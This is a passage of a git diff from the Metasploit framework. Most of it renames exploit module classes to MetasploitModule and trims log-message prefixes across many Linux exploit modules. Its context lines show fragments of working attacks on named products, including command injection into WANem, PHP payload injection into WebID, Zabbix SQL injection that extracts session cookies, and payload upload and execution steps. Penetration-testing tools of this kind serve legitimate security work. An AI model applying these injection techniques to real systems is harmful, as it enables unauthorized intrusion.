ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -47,7 +47,6 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb index 9cfd6f0a9a..b14df13f6d 100644 --- a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb +++ b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -80,11 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase } model = "DS#{model}" unless model =~ /^[A-Z]/ else - vprint_status("#{peer} - Detection failed") + vprint_status("Detection failed") return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Model #{model} with version #{version}-#{build} detected") + vprint_status("Model #{model} with version #{version}-#{build} detected") case version when '4.0' @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1') # send request to append shell commands - print_status("#{peer} - Injecting the payload...") + print_status("Injecting the payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('webman', 'imageSelector.cgi'), @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote end # send request to invoke the injected shell commands - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('redirect.cgi'), @@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed") end - print_good("#{peer} - Command successfully executed") + print_good("Command successfully executed") print_line(res.body) end end diff --git a/modules/exploits/linux/http/vap2500_tools_command_exec.rb b/modules/exploits/linux/http/vap2500_tools_command_exec.rb index e64f6b7146..24e3053e41 100644 --- a/modules/exploits/linux/http/vap2500_tools_command_exec.rb +++ b/modules/exploits/linux/http/vap2500_tools_command_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -71,13 +71,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") if datastore['PAYLOAD'] == 'cmd/unix/generic' exploit_cmd @@ -102,9 +102,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ - print_good("#{peer} - Command sent successfully") + print_good("Command sent successfully") if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m - print_status("#{peer} - Command output: #{$1}") + print_status("Command output: #{$1}") end else fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed") diff --git a/modules/exploits/linux/http/vcms_upload.rb b/modules/exploits/linux/http/vcms_upload.rb index f645a359fc..01a99e80ec 100644 --- a/modules/exploits/linux/http/vcms_upload.rb +++ b/modules/exploits/linux/http/vcms_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/wanem_exec.rb b/modules/exploits/linux/http/wanem_exec.rb index 2ee3d5bb07..e75ce9a283 100644 --- a/modules/exploits/linux/http/wanem_exec.rb +++ b/modules/exploits/linux/http/wanem_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "pc=127.0.0.1; " data << Rex::Text.uri_encode("echo #{fingerprint}") data << "%26" - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "pc=127.0.0.1; " data << Rex::Text.uri_encode(payload.raw) data << "%26" - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ 'uri' => '/WANem/result.php', @@ -100,12 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") end if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else - print_error("#{peer} - Sending payload failed") + print_error("Sending payload failed") end end diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index 0aa9a24a84..0ca6edf548 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = target_uri.path - print_status("#{peer} - Housing php payload...") + print_status("Housing php payload...") # Allow commands to be passed as a header. # We use 'data' instead of 'vars_post to avoid the MSF API escapeing our stuff. @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => post_data }) - print_status("#{peer} - Loading our payload...") + print_status("Loading our payload...") # Execute our payload send_request_raw({ diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 27ad401c98..1d7bbbe1a9 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -82,8 +82,8 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{client.peerhost}:#{client.peerport}" if client.type != "meterpreter" - print_error("#{peer} - NOTE: you must use a meterpreter payload in order to automatically cleanup.") - print_error("#{peer} - The currencies.php won't be restored automatically.") + print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.") + print_error("The currencies.php won't be restored automatically.") return end @@ -102,19 +102,19 @@ class Metasploit3 < Msf::Exploit::Remote currencies_php = currencies_php.gsub(/^ {6}/, '') pwd = client.fs.dir.pwd - print_status("#{peer} - Searching currencies.php file from #{pwd}") + print_status("Searching currencies.php file from #{pwd}") res = client.fs.file.search(nil, "currencies.php", true, -1) res.each do |hit| filename = "#{hit['path']}/#{hit['name']}" - print_warning("#{peer} - Restoring #{filename}") + print_warning("Restoring #{filename}") client.fs.file.rm(filename) fd = client.fs.file.new(filename, "wb") fd.write(currencies_php) fd.close end - print_status("#{peer} - Cleanup finished") + print_status("Cleanup finished") end @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote stub = "\0'));#{payload.encoded}?>" - print_status("#{peer} - Injecting the PHP payload") + print_status("Injecting the PHP payload") response = send_request_cgi({ 'uri' => normalize_uri(uri, "converter.php"), @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("#{peer} - Executing the PHP payload") + print_status("Executing the PHP payload") timeout = 0.01 response = send_request_cgi({ diff --git a/modules/exploits/linux/http/zabbix_sqli.rb b/modules/exploits/linux/http/zabbix_sqli.rb index 73ae05f5fa..ac08535943 100644 --- a/modules/exploits/linux/http/zabbix_sqli.rb +++ b/modules/exploits/linux/http/zabbix_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -72,10 +72,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/ version = $1 - vprint_status("#{peer} - Zabbix version #{version} detected") + vprint_status("Zabbix version #{version} detected") else # If this fails, guest access may not be enabled - vprint_status("#{peer} - Unable to access httpmon.php") + vprint_status("Unable to access httpmon.php") return Exploit::CheckCode::Unknown end @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 and res.body =~ /(?<=#{sqlq})(.*)(?=#{sqlq})/ session = $1 - print_status("#{peer} - Extracted session cookie - [ #{session} ]") + print_status("Extracted session cookie - [ #{session} ]") return session else fail_with(Failure::Unknown, "#{peer} - Unable to extract a valid session") @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote @sid = "#{@session[16..-1]}" script_name = rand_text_alpha(8) # Upload script - print_status("#{peer} - Attempting to inject payload") + print_status("Attempting to inject payload") res = send_request_cgi({ 'method' => 'POST', 'cookie' => "zbx_sessionid=#{@session}", @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /(Script added)/ - print_status("#{peer} - Payload injected successfully") + print_status("Payload injected successfully") else fail_with(Failure::Unknown, "#{peer} - Payload injection failed!") end @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup post_data = "sid=#{@sid}&form_refresh=1&scripts[#{@scriptid}]=#{@scriptid}&go=delete&goButton=Go (1)" - print_status("#{peer} - Cleaning script remnants") + print_status("Cleaning script remnants") res = send_request_cgi({ 'method' => 'POST', 'data' => post_data, @@ -173,9 +173,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /(Script deleted)/ - print_status("#{peer} - Script removed successfully") + print_status("Script removed successfully") else - print_warning("#{peer} - Unable to remove script #{@scriptid}") + print_warning("Unable to remove script #{@scriptid}") end end end diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index 9a3a544ed4..d388ce25d8 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from config file - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ 'uri' => '/config/global.conf' @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote lines = rand(100) + 1 # send payload - print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)") + print_status("Sending payload (#{payload.encoded.length} bytes)") begin res = send_request_cgi({ 'uri' => '/index.cgi', diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index 30baf11724..e92284d97c 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/ return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Save @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}" # send payload - print_status("#{peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)") + print_status("Sending payload to Zenoss (#{command.length.to_s} bytes)") begin res = send_request_cgi({ 'method' => 'POST', @@ -94,14 +94,14 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => "#{postdata}", }) if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/ - print_error("#{peer} - Authentication failed. Incorrect username/password.") + print_error("Authentication failed. Incorrect username/password.") return end - print_status("#{peer} - Sent payload successfully") + print_status("Sent payload successfully") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") rescue - print_error("#{peer} - Sending payload failed") + print_error("Sending payload failed") end handler diff --git a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb index 834763a5ad..02b241e7f3 100644 --- a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb +++ b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb index 33c4fe64af..219b4303e0 100644 --- a/modules/exploits/linux/ids/snortbopre.rb +++ b/modules/exploits/linux/ids/snortbopre.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index a8eb39a855..e540d03efe 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Brute diff --git a/modules/exploits/linux/local/desktop_privilege_escalation.rb b/modules/exploits/linux/local/desktop_privilege_escalation.rb index f325ba29ea..6ece63523c 100644 --- a/modules/exploits/linux/local/desktop_privilege_escalation.rb +++ b/modules/exploits/linux/local/desktop_privilege_escalation.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/exe' require 'base64' require 'metasm' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb index b6a739210f..2a1659297a 100644 --- a/modules/exploits/linux/local/hp_smhstart.rb +++ b/modules/exploits/linux/local/hp_smhstart.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/kloxo_lxsuexec.rb b/modules/exploits/linux/local/kloxo_lxsuexec.rb index b9f5606758..94c13c69c8 100644 --- a/modules/exploits/linux/local/kloxo_lxsuexec.rb +++ b/modules/exploits/linux/local/kloxo_lxsuexec.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/pkexec.rb b/modules/exploits/linux/local/pkexec.rb index a4985734e7..fef8cf0a34 100644 --- a/modules/exploits/linux/local/pkexec.rb +++ b/modules/exploits/linux/local/pkexec.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/sock_sendpage.rb b/modules/exploits/linux/local/sock_sendpage.rb index 9c9fb6bbe7..b55bc4d413 100644 --- a/modules/exploits/linux/local/sock_sendpage.rb +++ b/modules/exploits/linux/local/sock_sendpage.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb index 655f0c719e..c08cb2c8d7 100644 --- a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb +++ b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/udev_netlink.rb b/modules/exploits/linux/local/udev_netlink.rb index e9830d13ba..7e5a5432ae 100644 --- a/modules/exploits/linux/local/udev_netlink.rb +++ b/modules/exploits/linux/local/udev_netlink.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb index 93cb8106d5..66cffb1370 100644 --- a/modules/exploits/linux/local/vmware_mount.rb +++ b/modules/exploits/linux/local/vmware_mount.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/zpanel_zsudo.rb b/modules/exploits/linux/local/zpanel_zsudo.rb index 7a00c6d689..4a04be62c5 100644 --- a/modules/exploits/linux/local/zpanel_zsudo.rb +++ b/modules/exploits/linux/local/zpanel_zsudo.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb index d60f8cd99d..85c416e432 100644 --- a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb +++ b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'openssl' require 'rexml/element' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index f1e7fa938d..fded503b2e 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'drb/drb' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking def initialize(info = {}) diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb index d0fe8ca222..96b42453d6 100644 --- a/modules/exploits/linux/misc/gld_postfix.rb +++ b/modules/exploits/linux/misc/gld_postfix.rb @@ -7,7 +7,7 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote + class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hikvision_rtsp_bof.rb b/modules/exploits/linux/misc/hikvision_rtsp_bof.rb index 5ff60004ac..22da78f4b0 100644 --- a/modules/exploits/linux/misc/hikvision_rtsp_bof.rb +++ b/modules/exploits/linux/misc/hikvision_rtsp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb b/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb index a41272c31f..bcd21a3f2d 100644 --- a/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb +++ b/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb b/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb index c48287ca88..e5713e21a6 100644 --- a/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb +++ b/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/misc/hp_vsa_login_bof.rb b/modules/exploits/linux/misc/hp_vsa_login_bof.rb index 6798e4ff53..9c698a5f23 100644 --- a/modules/exploits/linux/misc/hp_vsa_login_bof.rb +++ b/modules/exploits/linux/misc/hp_vsa_login_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hplip_hpssd_exec.rb b/modules/exploits/linux/misc/hplip_hpssd_exec.rb index 35658aaeda..2c591b6186 100644 --- a/modules/exploits/linux/misc/hplip_hpssd_exec.rb +++ b/modules/exploits/linux/misc/hplip_hpssd_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_inet_connect.rb b/modules/exploits/linux/misc/ib_inet_connect.rb index b03053e9be..6804678d9c 100644 --- a/modules/exploits/linux/misc/ib_inet_connect.rb +++ b/modules/exploits/linux/misc/ib_inet_connect.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_jrd8_create_database.rb b/modules/exploits/linux/misc/ib_jrd8_create_database.rb index f29e9e831b..abaa69dc85 100644 --- a/modules/exploits/linux/misc/ib_jrd8_create_database.rb +++ b/modules/exploits/linux/misc/ib_jrd8_create_database.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_open_marker_file.rb b/modules/exploits/linux/misc/ib_open_marker_file.rb index 745eebb2f2..68002ee8b1 100644 --- a/modules/exploits/linux/misc/ib_open_marker_file.rb +++ b/modules/exploits/linux/misc/ib_open_marker_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb index 0c38798c19..6ea756791d 100644 --- a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb +++ b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index c7eec77106..54ac018b40 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp @@ -52,10 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']), Opt::RPORT('8080') ], self.class) + + register_advanced_options([ + OptPort.new('XJenkinsCliPort', [false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.']) + ], self.class) + end + + def cli_port + @jenkins_cli_port || datastore['XJenkinsCliPort'] end def exploit - unless vulnerable? + if cli_port == 0 && !vulnerable? fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...") end invoke_remote_method(set_payload) @@ -155,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote def invoke_remote_method(serialized_java_stream) begin - socket = connect(true, {'RPORT' => @jenkins_cli_port}) + socket = connect(true, {'RPORT' => cli_port}) print_status 'Sending headers...' socket.put(read_bin_file('serialized_jenkins_header')) diff --git a/modules/exploits/linux/misc/lprng_format_string.rb b/modules/exploits/linux/misc/lprng_format_string.rb index ea1f0cd5df..f40fecdcba 100644 --- a/modules/exploits/linux/misc/lprng_format_string.rb +++ b/modules/exploits/linux/misc/lprng_format_string.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/mongod_native_helper.rb b/modules/exploits/linux/misc/mongod_native_helper.rb index ff457795de..331e842c2f 100644 --- a/modules/exploits/linux/misc/mongod_native_helper.rb +++ b/modules/exploits/linux/misc/mongod_native_helper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb index 2048a5c6fc..3ac5320c90 100644 --- a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb +++ b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/netsupport_manager_agent.rb b/modules/exploits/linux/misc/netsupport_manager_agent.rb index 1ab5730b3b..abfa4247a6 100644 --- a/modules/exploits/linux/misc/netsupport_manager_agent.rb +++ b/modules/exploits/linux/misc/netsupport_manager_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb index 479740e771..3b1ea17ab1 100644 --- a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/sercomm_exec.rb b/modules/exploits/linux/misc/sercomm_exec.rb index 39e294bd2b..ed0637d842 100644 --- a/modules/exploits/linux/misc/sercomm_exec.rb +++ 